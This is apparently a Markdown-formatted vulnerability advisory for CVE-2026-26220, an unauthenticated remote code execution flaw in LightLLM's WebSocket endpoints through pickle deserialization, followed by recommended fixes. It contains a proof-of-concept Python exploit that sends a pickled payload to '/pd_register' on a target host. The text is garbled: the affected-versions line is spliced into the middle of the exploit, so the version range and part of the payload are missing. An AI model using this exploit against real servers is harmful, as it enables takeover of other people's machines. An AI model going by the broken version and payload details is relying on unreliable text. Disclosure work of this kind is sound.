以下是关于漏洞的关键信息简洁的Markdown格式化文本: ```markdown # CVE-2026-26220: Unauthenticated RCE via Pickle Deserialization in PD WebSocket Endpoints ## Summary - **CVE**: CVE-2026-26220 - **CVSS 4.0**: 9.3 Critical (AV:N/AC:L/AT:N/PR:N/UI:N/N:VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) - **CWE**: CWE-502 - Deserialization of Untrusted Data ## Affected Versions - LightLLM /tmp/pwned',)) async def exploit(target): async with websockets.connect(f'ws://{target}/pd_register') as ws: await ws.send(json.dumps({ "node_id": 9999, "client_ip_port": "127.0.0.1:9999", "mode": "prefill", "start_args": {}, })) await ws.send(pickle.dumps(RCE())) asyncio.run(exploit('TARGET:8000')) ``` ## Confirmed Result RCE confirmed on `/pd_register` and `/kv_move_status`. ## Affected Deployments Any LightLLM setup in PD mode (`--run_mode prefill`, `--run_mode decode`, `--run_mode pd_master`). ## Recommended Fix 1. Replace `pickle.loads()` with safe formats like JSON, MessagePack, or protobuf. 2. Add WebSocket authentication. 3. If pickle is required, implement HMAC-based message signing and restrict WebSocket connections via authentication. ```